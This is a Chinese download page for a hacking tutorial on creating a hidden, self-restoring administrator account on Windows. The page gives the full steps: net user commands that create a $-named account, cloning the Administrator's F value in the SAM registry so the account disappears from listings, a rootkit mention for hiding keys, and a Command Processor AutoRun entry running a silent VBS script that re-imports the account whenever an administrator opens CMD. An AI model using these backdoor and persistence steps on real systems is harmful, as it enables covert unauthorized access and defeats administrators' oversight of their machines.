下载月排行
立即下载创建不死帐号
软件大小: | 20.6 MB |
---|---|
软件语言: | 简体中文 |
软件类别: | 黑客教学 - 黑客动画 |
授权方式: | 共享版 |
应用平台: | Win9X/2000/XP/2003/ |
更新时间: | 2008/8/19 13:46:20 |
开 发 商: | 暂无信息 |
联 系 人: | 暂无联系方式 |
分享收藏 | |
解压密码: | 本站默认解压密码:www.987654321sf.com |
推荐等级: | |
会员中心: | 【账号登录】 【账号注册】 开通VIP下载流程 |
查毒情况: |
[复制下载页面地址给QQ/MSN上的好友]软件介绍
大家好,今天给大家做的动画是建立不死帐户。
1.首先我们在DOS下建立一个用户
net user yecha$ yecha /add
建立用户yecha$
net localgroup administrators yecha$ /add
将yecha$提升到管理员组
2.接着打开注册表,输入:regedit,我们找到HKEY_LOCAL_MACHINE\SAM\SAM,这个时候SAM项是打不开的,我们要给他相应的权限。添加你现在登陆系统的用户,给他完全控制的权限,然后刷新,就可以打开!
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names 来到这里,我们找到刚刚建立的用户
yecha$。再将yecha$的相关项导出,yecha$对用的F值导出。最后导出administrator的F值。
3.在DOS下将yecha$用户删除,然后我们将administrator的F值复制给yecha$。
将修改后的yecha$注册表信息导入注册表。
4.OK,这个时候大家可能会问这样做有什么意思呢?而且这种简单的建立帐户早就会了。当然我知道很多朋友都会这种方法来建立隐藏帐户,因为到了这一步的时候在CMD下和本地用户和组里都查看不到我们建立的这个用户!唯一存在的就是在我们的注册表里仍然有这个用户。
说到这里,我想到的就是两种思路:
一是想办法在注册表里将我们的这个用户所在注册表的键值隐藏。
二是管理员在注册表里把我们的这个用户所在注册表的键值删掉后,我们怎么能让它再自动创建。
第一种方法我不想讲了,如果大家这几天一直看我教程的话,就知道用rootkit就可以隐藏注册表键值。
用ROOTKIT这款DOS下的超级隐藏工具完全可以轻松做到这一点!
第二种方法就是今天我讲到的。
KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
在注册表中这个项起什么作用大家知道吗?没错,他起到的作用就是打开CMD自动运行我们编辑好的脚本文件。只要在AutoRun键值中输入我们的脚本路径就OK。
那我们可以建立一个自动导入注册表的脚本文件:
On Error Resume Next
set yecha=wscript.createobject("wscript.shell")
yecha.run "regedit.exe /s yecha$.reg",0
yecha.run "regedit.exe /s yechaF.reg",0
将它保存为VBS文件后,放到一个隐蔽的路径下。 好,这个时候我们手工把注册表里的yecha$这个键值删掉,模仿管理员的操作。 好,我们删掉,可是管理员会经常使用CMD命令查看一些信息,这个时候比如管理员要查看机器开了哪些端口,他就执行CMD命令.看,他刚刚打开CMD窗口,结果我们的用户信息又都回来了。。。怎么样?很好的方法吧?
这样当我们每次运行CMD命令的时候就会自动运行我们的脚本文件。思路就是这样了。
那我们实验以下,我们能用yecha$这个用户登陆不。等一下,机器有点卡了。没有问题!
好了,今天的教程就做到这,如果有什么不懂的可以加QQ群:47688744 新建不到4天。希望大家多来交流。。。
相关软件
- ☉ 创建不死帐号